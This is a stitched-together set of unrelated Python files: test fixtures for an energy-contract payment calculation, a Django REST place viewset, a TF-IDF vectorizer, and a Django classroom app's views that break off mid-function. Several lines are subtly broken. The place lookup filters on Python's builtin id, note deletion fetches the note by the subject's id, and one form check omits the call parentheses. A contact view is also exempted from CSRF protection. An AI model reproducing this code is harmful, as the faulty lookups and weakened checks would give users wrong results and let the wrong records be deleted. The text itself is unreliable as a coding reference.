'announcementDate': datetime(2017, 8, 18)}
CONTRACT_DURATION = {
'input': [
{'years': 0, 'days': 0}, {'years': 0, 'days': 1},
{'years': 0, 'days': 8}, {'years': 0, 'days': 31},
{'years': 0, 'days': 91}, {'years': 0, 'days': 92},
{'years': 0, 'days': 180}, {'years': 0, 'days': 182},
{'years': 0, 'days': 184}, {'years': 0, 'days': 256},
{'years': 0, 'days': 360}, {'years': 0, 'days': 361},
{'years': 0, 'days': 362}, {'years': 0, 'days': 363},
{'years': 0, 'days': 364}, {'years': 1, 'days': 0},
{'years': 2, 'days': 1}, {'years': 1, 'days': 8},
{'years': 2, 'days': 31},{'years': 1, 'days': 91},
{'years': 2, 'days': 92}, {'years': 1, 'days': 180},
{'years': 2, 'days': 182}, {'years': 1, 'days': 184},
{'years': 2, 'days': 256}, {'years': 1, 'days': 360},
{'years': 2, 'days': 361}, {'years': 1, 'days': 362},
{'years': 2, 'days': 363}, {'years': 1, 'days': 364},
{'years': 3, 'days': 0}, {'years': 7, 'days': 1},
{'years': 3, 'days': 8}, {'years': 8, 'days': 31},
{'years': 4, 'days': 91}, {'years': 9, 'days': 92},
{'years': 5, 'days': 180}, {'years': 10, 'days': 182},
{'years': 6, 'days': 184}, {'years': 11, 'days': 256},
{'years': 7, 'days': 360}, {'years': 12, 'days': 361},
{'years': 8, 'days': 362}, {'years': 13, 'days': 363},
{'years': 9, 'days': 364}, {'years': 10, 'days': 0},
{'years': 10, 'days': 1}, {'years': 11, 'days': 8},
{'years': 14, 'days': 30},{'years': 14, 'days': 31},
{'years': 14, 'days': 90}, {'years': 14, 'days': 91},
{'years': 14, 'days': 92}, {'years': 14, 'days': 180},
{'years': 14, 'days': 181}, {'years': 14, 'days': 182},
{'years': 14, 'days': 361}, {'years': 14, 'days': 362},
{'years': 14, 'days': 363}, {'years': 14, 'days': 364},
{'years': 15, 'days': 0}
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '1810.95435405817'},
{'amountContract': '0.47947407407',
'amountPerformance': '1810.49606787280'},
{'amountContract': '3.83579259259',
'amountPerformance': '1807.28806457523'},
{'amountContract': '14.86369629630',
'amountPerformance': '1796.74748231179'},
{'amountContract': '43.63214074074',
'amountPerformance': '1769.25031118977'},
{'amountContract': '44.11161481481',
'amountPerformance': '1768.79202500440'},
{'amountContract': '86.30434246575',
'amountPerformance': '1730.75511346897'},
{'amountContract': '87.26324657534',
'amountPerformance': '1729.94041988832'},
{'amountContract': '88.22215068493',
'amountPerformance': '1729.12572630767'},
{'amountContract': '122.74269863014',
'amountPerformance': '1699.79675740423'},
{'amountContract': '172.60571232877',
'amountPerformance': '1657.43269121038'},
{'amountContract': '173.08516438356',
'amountPerformance': '1657.02534442005'},
{'amountContract': '173.56461643836',
'amountPerformance': '1656.61799762973'},
{'amountContract': '174.04406849315',
'amountPerformance': '1656.21065083940'},
{'amountContract': '174.52352054795',
'amountPerformance': '1655.80330404908'},
{'amountContract': '175.00297260274',
'amountPerformance': '1655.39595725875'},
{'amountContract': '350.48242465753',
'amountPerformance': '1516.76226628463'},
{'amountContract': '178.83858904110',
'amountPerformance': '1652.13718293615'},
{'amountContract': '364.86598630137',
'amountPerformance': '1505.89968520929'},
{'amountContract': '218.63310958904',
'amountPerformance': '1618.32739933913'},
{'amountContract': '394.11256164384',
'amountPerformance': '1483.81243702275'},
{'amountContract': '261.30434246575',
'amountPerformance': '1584.11026895179'},
{'amountContract': '437.26324657534',
'amountPerformance': '1453.11558753945'},
{'amountContract': '263.22215068493',
'amountPerformance': '1582.66192480841'},
{'amountContract': '472.74269863014',
'amountPerformance': '1429.29837273721'},
{'amountContract': '347.60571232877',
'amountPerformance': '1518.93478249970'},
{'amountContract': '523.08516438356',
'amountPerformance': '1395.50367605835'},
{'amountContract': '348.56461643836',
'amountPerformance': '1518.21061042801'},
{'amountContract': '524.04406849315',
'amountPerformance': '1394.85996755018'},
{'amountContract': '349.52352054795',
'amountPerformance': '1517.48643835632'},
{'amountContract': '525.00297260274',
'amountPerformance': '1394.21625904202'},
{'amountContract': '1225.48242465753',
'amountPerformance': '1024.59792121607'},
{'amountContract': '528.83858904110',
'amountPerformance': '1391.64142500934'},
{'amountContract': '1414.86598630137',
'amountPerformance': '951.05679958049'},
{'amountContract': '743.63310958904',
'amountPerformance': '1258.93018757522'},
{'amountContract': '1619.11256164384',
'amountPerformance': '881.36067351043'},
{'amountContract': '961.30434246575',
'amountPerformance': '1143.34874877515'},
{'amountContract': '1837.26324657534',
'amountPerformance': '817.12906555064'},
{'amountContract': '1138.22215068493',
'amountPerformance': '1061.16755000753'},
{'amountContract': '2047.74269863014',
'amountPerformance': '763.74700436815'},
{'amountContract': '1397.60571232877',
'amountPerformance': '957.48662442295'},
{'amountContract': '2273.08516438356',
'amountPerformance': '714.14055865311'},
{'amountContract': '1573.56461643836',
'amountPerformance': '896.44297869644'},
{'amountContract': '2449.04406849315',
'amountPerformance': '680.27668462186'},
{'amountContract': '1749.52352054795',
'amountPerformance': '842.21724051892'},
{'amountContract': '1750.00297260274',
'amountPerformance': '842.07611953472'},
{'amountContract': '1750.48242465753',
'amountPerformance': '841.93499855052'},
{'amountContract': '1928.83858904110',
'amountPerformance': '793.16985845594'},
{'amountContract': '2464.38653424658',
'amountPerformance': '677.45744827975'},
{'amountContract': '2464.86598630137',
'amountPerformance': '677.36934714405'},
{'amountContract': '2493.15365753425',
'amountPerformance': '672.17138013828'},
{'amountContract': '2493.63310958904',
'amountPerformance': '672.08327900259'},
{'amountContract': '2494.11256164384',
'amountPerformance': '671.99517786690'},
{'amountContract': '2536.30434246575',
'amountPerformance': '664.68278360454'},
{'amountContract': '2536.78379452055',
'amountPerformance': '664.60447148393'},
{'amountContract': '2537.26324657534',
'amountPerformance': '664.52615936331'},
{'amountContract': '2623.08516438356',
'amountPerformance': '650.50828977336'},
{'amountContract': '2623.56461643836',
'amountPerformance': '650.42997765275'},
{'amountContract': '2624.04406849315',
'amountPerformance': '650.35166553213'},
{'amountContract': '2624.52352054795',
'amountPerformance': '650.27335341152'},
{'amountContract': '2625.00297260274',
'amountPerformance': '650.19504129090'}
]
}
ANNOUNCEMENT_DATE = {
'input': [
datetime(2017, 5, 2), datetime(2017, 5, 3), datetime(2017, 5, 4),
datetime(2017, 5, 5), datetime(2017, 5, 6), datetime(2017, 5, 7),
datetime(2017, 5, 8), datetime(2017, 5, 9), datetime(2017, 5, 10),
datetime(2017, 5, 11), datetime(2017, 12, 30), datetime(2018, 1, 1),
datetime(2018, 1, 31), datetime(2018, 2, 1), datetime(2018, 12, 30),
],
'expected_results': [
{'amountContract': '303.01667123288',
'amountPerformance': '1493.11261864549'},
{'amountContract': '303.49612328767',
'amountPerformance': '1493.29714530232'},
{'amountContract': '303.97557534247',
'amountPerformance': '1493.48174786072'},
{'amountContract': '304.45502739726',
'amountPerformance': '1493.66642643300'},
{'amountContract': '304.93447945205',
'amountPerformance': '1493.85118113158'},
{'amountContract': '305.41393150685',
'amountPerformance': '1494.03601206895'},
{'amountContract': '305.89338356164',
'amountPerformance': '1494.22091935769'},
{'amountContract': '306.37283561644',
'amountPerformance': '1494.40590311049'},
{'amountContract': '306.85228767123',
'amountPerformance': '1494.59096344011'},
{'amountContract': '307.33173972603',
'amountPerformance': '1494.77610045941'},
{'amountContract': '419.04406849315',
'amountPerformance': '1540.63620088962'},
{'amountContract': '245.00297260274',
'amountPerformance': '1471.31191860622'},
{'amountContract': '259.38653424658',
'amountPerformance': '1476.62410121389'},
{'amountContract': '259.86598630137',
'amountPerformance': '1476.80218008027'},
{'amountContract': '419.04406849315',
'amountPerformance': '1540.63620088962'},
]
}
PAYMENTS_PERCENTAGE = {
'input': [
0.0000, 0.0001, 0.0009, 0.0010, 0.0100, 0.1000, 0.0499, 0.0500, 0.4900,
0.4999, 0.5000, 0.7100, 0.7200, 0.7300, 0.7400, 0.7500, 0.7600, 0.7700,
0.7800, 0.7900, 0.8000, 0.8900, 0.8990, 0.8999, 0.9000
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '1810.95435405817'},
{'amountContract': '0.05068535616',
'amountPerformance': '1810.91186107787'},
{'amountContract': '0.45616820548',
'amountPerformance': '1810.57191723547'},
{'amountContract': '0.50685356164',
'amountPerformance': '1810.52942425517'},
{'amountContract': '5.06853561644',
'amountPerformance': '1806.70505602822'},
{'amountContract': '50.68535616438',
'amountPerformance': '1768.46137375872'},
{'amountContract': '25.29199272603',
'amountPerformance': '1789.75035688874'},
{'amountContract': '25.34267808219',
'amountPerformance': '1789.70786390844'},
{'amountContract': '248.35824520548',
'amountPerformance': '1602.73875059087'},
{'amountContract': '253.37609546575',
'amountPerformance': '1598.53194554123'},
{'amountContract': '253.42678082192',
'amountPerformance': '1598.48945256093'},
{'amountContract': '359.86602876712',
'amountPerformance': '1509.25419393209'},
{'amountContract': '364.93456438356',
'amountPerformance': '1505.00489590214'},
{'amountContract': '370.00310000000',
'amountPerformance': '1500.75559787220'},
{'amountContract': '375.07163561644',
'amountPerformance': '1496.50629984225'},
{'amountContract': '380.14017123288',
'amountPerformance': '1492.25700181231'},
{'amountContract': '385.20870684932',
'amountPerformance': '1488.00770378236'},
{'amountContract': '390.27724246575',
'amountPerformance': '1483.75840575242'},
{'amountContract': '395.34577808219',
'amountPerformance': '1479.50910772247'},
{'amountContract': '400.41431369863',
'amountPerformance': '1475.25980969253'},
{'amountContract': '405.48284931507',
'amountPerformance': '1471.01051166258'},
{'amountContract': '451.09966986301',
'amountPerformance': '1432.76682939308'},
{'amountContract': '455.66135191781',
'amountPerformance': '1428.94246116613'},
{'amountContract': '456.11752012329',
'amountPerformance': '1428.56002434343'},
{'amountContract': '456.16820547945',
'amountPerformance': '1428.51753136313'},
]
}
DISCOUNT_RATES = {
'input': [
0.0000, 0.0001, 0.0010, 0.0100, 0.1000, 1.0000, 0.1249, 0.1250, 0.1300,
0.1500, 0.1800, 0.2000, 0.2200, 0.3000, 0.4000, 0.5000, 0.6000, 0.7000,
0.8000, 0.9000, 0.9900, 0.9909, 0.9990, 0.9999
],
'expected_results': [
{'amountContract': '354.79749315068',
'amountPerformance': '4645.20675342466'},
{'amountContract': '354.79749315068',
'amountPerformance': '4640.02004460226'},
{'amountContract': '354.79749315068',
'amountPerformance': '4593.68225030323'},
{'amountContract': '354.79749315068',
'amountPerformance': '4162.36042333301'},
{'amountContract': '354.79749315068',
'amountPerformance': '1821.63775269194'},
{'amountContract': '354.79749315068',
'amountPerformance': '117.87571646511'},
{'amountContract': '354.79749315068',
'amountPerformance': '1514.57663165387'},
{'amountContract': '354.79749315068',
'amountPerformance': '1513.50349196203'},
{'amountContract': '354.79749315068',
'amountPerformance': '1461.26832468564'},
{'amountContract': '354.79749315068',
'amountPerformance': '1277.36248402751'},
{'amountContract': '354.79749315068',
'amountPerformance': '1061.29444236423'},
{'amountContract': '354.79749315068',
'amountPerformance': '947.18616001753'},
{'amountContract': '354.79749315068',
'amountPerformance': '851.26540354660'},
{'amountContract': '354.79749315068',
'amountPerformance': '588.29996204648'},
{'amountContract': '354.79749315068',
'amountPerformance': '407.85685451746'},
{'amountContract': '354.79749315068',
'amountPerformance': '303.61355861378'},
{'amountContract': '354.79749315068',
'amountPerformance': '237.36786431275'},
{'amountContract': '354.79749315068',
'amountPerformance': '192.32300937991'},
{'amountContract': '354.79749315068',
'amountPerformance': '160.12224139859'},
{'amountContract': '354.79749315068',
'amountPerformance': '136.19991118181'},
{'amountContract': '354.79749315068',
'amountPerformance': '119.50923564960'},
{'amountContract': '354.79749315068',
'amountPerformance': '119.36059287924'},
{'amountContract': '354.79749315068',
'amountPerformance': '118.03729764291'},
{'amountContract': '354.79749315068',
'amountPerformance': '117.89185707063'},
]
}
ANNUAL_COSTS_REDUCTION = {
'input': [
[0] * 20 + [0.01],
[0] * 18 + [0.01] * 3,
[0] * 11 + [0.01] * 10,
[0] * 3 + [0.01] * 18,
[0] * 2 + [0.01] * 19,
[0] + [0.01] * 20,
[0.01] * 21,
[0] * 20 + [1],
[0] * 18 + [1] * 3,
[0] * 11 + [1] * 10,
[0] * 3 + [1] * 18,
[0] * 2 + [1] * 19,
[0] + [1] * 20,
[1] * 21,
[i * 100 for i in (range(1, 22))],
[2200 - i * 100 for i in (range(1, 22))],
[123456789] * 21
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '0.00059563606'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.00276250500'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.01598505603'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.05285465322'},
{'amountContract': '0.00460273973',
'amountPerformance': '0.05693070745'},
{'amountContract': '0.01160273973',
'amountPerformance': '0.05947953451'},
{'amountContract': '0.01860273973',
'amountPerformance': '0.06234696495'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.05956360564'},
{'amountContract': '0.00000000000',
'amountPerformance': '0.27625049981'},
{'amountContract': '0.00000000000',
'amountPerformance': '1.59850560258'},
{'amountContract': '0.00000000000',
'amountPerformance': '5.28546532151'},
{'amountContract': '0.46027397260',
'amountPerformance': '5.69307074472'},
{'amountContract': '1.16027397260',
'amountPerformance': '5.94795345066'},
{'amountContract': '1.86027397260',
'amountPerformance': '6.23469649485'},
{'amountContract': '348.08219178082',
'amountPerformance': '5211.30198080864'},
{'amountContract': '3744.52054794521',
'amountPerformance': '8505.03030786802'},
{'amountContract': '229663451.31780821085',
'amountPerformance': '769715609.64411020279'}
]
}
BIDS = {
'input': [
{
'contractDuration': {'years': 0, 'days': 1},
'NBUdiscountRate': 0.0000,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [0] * 20 + [0.01]
},
{
'contractDuration': {'years': 0, 'days': 1},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 20 + [10000]
},
{
'contractDuration': {'years': 0, 'days': 1},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 1},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 135},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 136},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 10 + [10000] * 11
},
{
'contractDuration': {'years': 9, 'days': 136},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 11 + [10000] * 10
},
{
'contractDuration': {'years': 10, 'days': 136},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.8999,
'annualCostsReduction': [0] * 11 + [10000] * 10
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [92.47] + [250] * 20,
'announcementDate': datetime(2017, 12, 30)
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [92.47] + [250] * 20,
'announcementDate': datetime(2017, 12, 31)
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [92.47] + [250] * 20,
'announcementDate': datetime(2018, 1, 1)
},
{
'contractDuration': {'years': 2, 'days': 10},
'NBUdiscountRate': 0.1250,
'yearlyPaymentsPercentage': 0.7000,
'annualCostsReduction': [0] + [250] * 20,
'announcementDate': datetime(2018, 12, 31)
},
],
'expected_results': [
{'amountContract': '0.00000000000',
'amountPerformance': '0.00630136986'},
{'amountContract': '0.00000000000',
'amountPerformance': '595.63605641337'},
{'amountContract': '0.00000000000',
'amountPerformance': '18928.43655328417'},
{'amountContract': '0.00000000000',
'amountPerformance': '18928.43655328417'},
{'amountContract': '0.00000000000',
'amountPerformance': '18928.43655328417'},
{'amountContract': '24.65479452055',
'amountPerformance': '18921.17970907397'},
{'amountContract': '0.00000000000',
'amountPerformance': '15985.05602575644'},
{'amountContract': '24.65479452055',
'amountPerformance': '15978.60549756960'},
{'amountContract': '419.04406849315',
'amountPerformance': '1540.63620088962'},
{'amountContract': '354.79452054795',
'amountPerformance': '1513.14383477073'},
{'amountContract': '245.00297260274',
'amountPerformance': '1471.31191860622'},
{'amountContract': '354.79452054795',
'amountPerformance': '1513.14383477073'},
]
}
| python |
import copy
from rest_framework import viewsets
from rest_framework.decorators import api_view
from rest_framework.response import Response
from dashboard.models import Place
from api_v1.containers.place.serializers import PlaceSerializer
from api_v1.serializers import BatchRequestSerializer
class PlaceViewSet(viewsets.ModelViewSet):
serializer_class = PlaceSerializer
http_method_names = ['get', 'head']
def get_queryset(self):
return_places = Place.objects.all()
if(self.request.GET.get('name')):
placeName = self.request.GET.get('name')
return_place = return_places.filter(name__iexact=placeName).order_by('name').distinct('name')
return return_place
if(self.request.GET.get('id')):
placeId = self.request.GET.get('id')
return_place = return_places.filter(id=id)
return return_place
return return_places
@api_view(['POST'])
def request_multiple_places(request):
data = copy.deepcopy(request.data)
request_serializer = BatchRequestSerializer(data=data)
request_serializer.is_valid(raise_exception=True)
query_set = Place.objects.filter(pk__in=request_serializer.data['ids']).distinct('id')
response_serializer = PlaceSerializer(query_set, many=True)
return Response(response_serializer.data)
| python |
import re
import string
import numpy as np
from math import log
from typing import List
from collections import Counter
from .document import Document
class CountVectorizer:
@staticmethod
def split_iter(document_content: str):
"""
Splits document in words and returns it as generator.
Args:
document_content: Cleaned document content.
Returns: Generator of document terms.
"""
return (x.group(0) for x in re.finditer(r"[A-Za-z0-9]+", document_content))
def clean_document(self, document: str) -> str:
"""
Cleans text from any punctuation characters and lowers it.
Args:
document: Text to be cleaned.
Returns: Lowered string wihout punctuation sings.
"""
return document.lower().translate(str.maketrans("", "", string.punctuation))
def count_term_freq(self, document: Document) -> dict:
"""
Counts term frequency inside document.
Args:
document: Loaded document object.
Returns: Counter with term: count items.
"""
document = self.clean_document(document.content)
tokens = self.split_iter(document)
return Counter(tokens)
def vectorize(self, document: Document) -> np.ndarray:
"""
Counts document term frequency and returns it as vecotr.
Args:
document: Loaded document object.
Returns: Numpy array with term frequency values.
"""
return np.array(list(self.count_term_freq(document).values()))
class TfidfVectorizer(CountVectorizer):
def calculate_tfidf(self, term_freq: int, inverse_doc_freq: float) -> float:
"""
Calculates term frequency - inverse document frequency.
Args:
term_freq: Term frequency.
inverse_doc_freq: Inverse document frequency.
Returns: Product of term and inverse document frequency (float).
"""
return term_freq * inverse_doc_freq
def calculate_inverse_doc_freq(self, doc_num: int, term_doc_freq: int) -> float:
"""
Calculates inverse document frequency.
Args:
doc_num: Number of documents.
term_doc_freq: Number of term apperances in documents.
Returns: Inverse document frequency (float).
"""
return 0 if not term_doc_freq else log(doc_num / term_doc_freq)
def count_term_doc_freq(self, term: str, document: Document) -> int:
"""
Returns number of appearances of term for given document.
Args:
term: String.
document: Loaded document object.
Returns: Number of appearances of term for given document.
"""
return self.count_term_freq(document).get(term, 0)
def vectorize(self, document: Document, comp_documents: List[Document]) -> np.ndarray:
"""
Calculates TFIDF for given documents and returns it as matrix (numpy array).
Args:
document: Loaded document.
comp_documents: List of loaded documents.
Returns: Matrix (numpy array) representing TFIDF.
"""
term_frequencies = self.count_term_freq(document)
doc_number = len(comp_documents)
term_docs_frequencies = dict()
for comp_doc in comp_documents:
for term in term_frequencies.keys():
if term not in term_docs_frequencies:
term_docs_frequencies[term] = 1
term_docs_frequencies[term] += 1 if self.count_term_doc_freq(term, comp_doc) else 0
_tfidf = list()
for term in term_frequencies.keys():
term_freq = term_frequencies.get(term)
term_doc_freq = term_docs_frequencies.get(term)
inverse_term_freq = self.calculate_inverse_doc_freq(doc_number, term_doc_freq)
_tfidf.append(self.calculate_tfidf(term_freq, inverse_term_freq))
return np.array(_tfidf)
| python |
from django.contrib.auth.decorators import login_required
from django.shortcuts import render,redirect,get_object_or_404
from django.contrib.auth.models import User
from django.http import Http404,HttpResponse
from django.contrib import messages
from django.db.models import Q
from .forms import *
from .models import *
from .email import *
from .delete_notify import *
from .utils import *
from django.urls import reverse
import xlwt,datetime
from notifications.signals import notify
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt #checked
def home(request):
"""Landing Page"""
if request.user.is_authenticated:
return redirect(reverse('homepage'))
else:
if request.method=='POST':
name=request.POST.get('name')
email = request.POST.get('email')
message =f"{name} \n {email} \n {request.POST.get('message')} "
mail_subject = 'Contact us : Sent by ' + name
if(send_mail(mail_subject,message,'[email protected]',['[email protected]'])):
messages.add_message(request,messages.SUCCESS,'Your message sent successfully.')
else:
messages.add_message(request,messages.ERROR,"An Error while sending your message.\
Please try again or contact using given contact details.")
return render(request,'intro.html')
@login_required#checked
def homepage(request):
"""
Create a classroom, Join A classroom,
"""
user = request.user
if request.POST.get('join_key'):
join_key = request.POST.get('join_key')
try:
classroom = Classroom.objects.get(unique_id=join_key)
except Classroom.DoesNotExist:
messages.add_message(request, messages.WARNING,"No such classroom exists.")
return redirect(reverse('homepage'))
if classroom.members.all().filter(username=user.username).exists():
messages.add_message(request, messages.INFO,"You are already member of this class.")
return redirect(reverse('homepage'))
if classroom.need_permission:
classroom.pending_members.add(user)
messages.add_message(request, messages.SUCCESS,"Your request is sent.\
You can access classroom material when someone lets you in.")
user.profile.pending_invitations.add(classroom)
notify.send(sender=user,verb=f"{user.username} wants to join {classroom.class_name}",recipient=classroom.special_permissions.all(),
url=reverse('classroom_page',kwargs={
'unique_id':classroom.unique_id
}
))
else:
recipients = User.objects.filter(username__in=classroom.members.values_list('username', flat=True))
url = reverse('profile',kwargs={'username':user.username})
notify.send(sender=user,recipient=recipients,verb=f"{request.user.username} has joined {classroom.class_name}",url= url)
classroom.members.add(user)
return redirect(reverse('homepage'))
#create classroom
if request.method=='POST':
createclassform = CreateclassForm(request.POST ,request.FILES)
if createclassform.is_valid():
classroom=createclassform.save(commit=False)
classroom.unique_id = unique_id()
classroom.created_by = request.user
classroom.save()
classroom.members.add(request.user)
classroom.special_permissions.add(request.user)
return redirect(reverse('homepage'))
else:
createclassform = CreateclassForm()
#queryset
params={
'createclassform':createclassform,
}
return render(request,'homepage.html',params)
@login_required#checked
def admin_status(request,unique_id,username):
"""
Toggles admin status of users from a classroom
"""
classroom = get_object_or_404(Classroom,unique_id=unique_id)
admin = classroom.special_permissions.filter(username=request.user.username).exists()
if admin:
check = classroom.special_permissions.filter(username = username).exists()
user = User.objects.get(username=username)
url = reverse('classroom_page',kwargs={ 'unique_id':unique_id})
if check:
if classroom.created_by == user:
messages.add_message(request,messages.WARNING,"This user have created\
this class. He can't be dropped")
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
classroom.special_permissions.remove(user)
notify.send(sender=request.user,recipient = user,verb=f"You are no longer admin of {classroom.class_name}",url=url)
else:
classroom.special_permissions.add(user)
notify.send(sender=request.user,recipient = user,verb=f"Now you are admin of {classroom.class_name}",url=url)
return redirect(reverse('classroom_page',kwargs={'unique_id':classroom.unique_id}))
else:
raise Http404()
@login_required#checked
def classroom_page(request,unique_id):
"""
Classroom Setting Page.
"""
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user, classroom):
pending_members = classroom.pending_members.all()
admins = classroom.special_permissions.all()
members = admins | classroom.members.all()
is_admin = classroom.special_permissions.filter(username = request.user.username).exists()
#classroom_update
if request.method=="POST":
form = CreateclassForm(request.POST,request.FILES,instance=classroom)
if form.is_valid():
form.save()
return redirect(reverse('subjects',kwargs={'unique_id':classroom.unique_id}))
else:
form = CreateclassForm(instance=classroom)
params={
'members':members.distinct(),
'admins':admins,
'pending_members':pending_members,
'classroom':classroom,
'is_admin':is_admin,
'form':form,
}
return render(request,'classroom_settings.html',params)
@login_required#checked
def subjects(request, unique_id,form=None):
"""
Enlists all the subjects of a classroom ,
subjects can be added by admins
"""
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
#querysets
members = classroom.members.all()
subjects = Subject.objects.filter(classroom=classroom)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
# Admins can add a subject and assign a teacher to it
if admin_check and request.method=="POST":
form = SubjectForm(request.POST)
teacher = User.objects.get(username=request.POST.get('teacher'))
if form.is_valid():
subject=form.save(commit=False)
subject.classroom=classroom
subject.teacher = teacher
subject.save()
subject.upload_permission.add(teacher)
recipients=User.objects.filter(username__in=classroom.members.values_list('username', flat=True))
url = reverse('subjects',kwargs={'unique_id':classroom.unique_id})
notify.send(sender=request.user,verb=f"subject {subject.subject_name} added in {classroom.class_name}",
recipient=recipients,url=url)
messages.add_message(request,messages.INFO,f"A new Subject {subject.subject_name} added")
classroom.teacher.add(teacher)
return redirect(url)
else:
form = SubjectForm()
params = {
'subjects':subjects,
'form':form,
'classroom':classroom,
'is_admin':admin_check,
'members':members
}
return render(request,'subjects_list.html',params)
@login_required#checked
def notes_list(request,unique_id,subject_id,form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
#querysets
subject = Subject.objects.get(id=subject_id)
notes = Note.objects.filter(subject_name=subject).order_by('-id')
if request.GET.get('search'):
search = request.GET.get('search')
notes = notes.filter(Q(topic__icontains=search)|Q(description__icontains=search))
query,page_range = pagination(request, notes)
upload_permission = subject.upload_permission.all().filter(username=request.user.username).exists()
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or upload_permission or request.user==subject.teacher
#Add note form handling
if is_teacher:
if request.method=="POST":
form = NoteForm(request.POST,request.FILES)
if form.is_valid:
data=form.save(commit=False)
data.subject_name = subject
data.uploaded_by = request.user
data.save()
messages.add_message(request,messages.SUCCESS,f"Your Note {data.topic} is added")
return redirect(reverse('resources',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
form= NoteForm()
params={
'form':form,
'subject':subject,
'classroom':classroom,
'notes':notes,
'page':query,
'page_range':page_range,
'is_teacher':is_teacher,
}
return render(request,'notes/notes_list.html',params)
@login_required#checked
def note_details(request, unique_id, subject_id, id, form = None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
#queryset
subject = Subject.objects.get(id=subject_id)
note = Note.objects.get(id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher or note.uploaded_by == request.user
if is_teacher:
if request.method=="POST":
form = NoteForm(request.POST,request.FILES,instance=note)
if form.is_valid():
form.file = request.POST.get('file')
form.save()
return redirect(reverse('read_note',kwargs={
'unique_id':classroom.unique_id,
'subject_id':subject.id,
'id':note.id
}))
else:
form= NoteForm(instance=note)
params={
'subject':subject,
'updateform':form,
'note':note,
'classroom':classroom,
'is_teacher': is_teacher,
'extension':extension_type(note.file)
}
return render(request,'notes/note_detail.html',params)
@login_required#checked
def note_delete(request,unique_id,subject_id,id):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
subject = get_object_or_404(Subject,id=subject_id)
note = get_object_or_404(Note,id=subject_id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or note.uploaded_by==request.user or request.user==subject.teacher
if is_teacher:
note.delete()
note_delete_notify(request,note)
return redirect(reverse('resources',kwargs={'unique_id':classroom.unique_id,'subject_id':subject.id}))
else:
raise Http404()
@login_required#checked
def assignments_list(request ,unique_id, subject_id, form=None):
classroom = get_object_or_404(Classroom,unique_id=unique_id)
if member_check(request.user,classroom):
subject = Subject.objects.get(id=subject_id)
assignments = Assignment.objects.filter(subject_name=subject).reverse()
search = request.GET.get('search')
if search:
assignments = assignments.filter(Q(topic__icontains=search)|Q(description__icontains=search))
query,page_range = pagination(request,assignments)
assignments=query.object_list
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or subject.teacher==request.user
if is_teacher:
if request.method=="POST":
form = AssignmentForm(request.POST,request.FILES)
if form.is_valid():
assignment = form.save(commit=False)
assignment.subject_name = subject
assignment.assigned_by = request.user
assignment.save()
return redirect(reverse('assignments',kwargs=
{'unique_id':classroom.unique_id,'subject_id':subject.id,}))
else:
form= AssignmentForm()
params={
'form':form,
'subject':subject,
'classroom':classroom,
'assignments':assignments,
'page':query,
'page_range':page_range,
}
return render(request,'assignments/assignment_list.html',params)
@login_required#checked
def assignment_details(request,unique_id,subject_id,id):
updateform = form = submission = submission_object = None
classroom = Classroom.objects.get(unique_id=unique_id)
if member_check(request.user, classroom):
subject = Subject.objects.get(id=subject_id)
assignment = Assignment.objects.get(id=id)
admin_check = classroom.special_permissions.filter(username = request.user.username).exists()
is_teacher = admin_check or request.user==subject.teacher
if is_teacher:
if request.method=="POST":
updateform = AssignmentForm(request.POST,request.FILES,instance=assignment)
if updateform.is_valid():
updateform.save()
return redirect(reverse('assignment_page',kwargs={
'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id}))
else:
updateform= AssignmentForm(instance=assignment)
#submitting assignment
else:
submission_object = Submission.objects.filter(Q(submitted_by=request.user) & Q(assignment=assignment)).first()
if request.method=="POST":
if assignment.submission_link:
form = SubmitAssignmentForm(request.POST, request.FILES,instance=submission_object)
if form.is_valid():
data=form.save(commit=False)
data.submitted_by=request.user
data.assignment= assignment
data.save()
assignment.submitted_by.add(request.user)
return redirect(reverse('assignment_page',kwargs=
{'unique_id':classroom.unique_id,'subject_id':subject.id,'id':assignment.id}))
else:
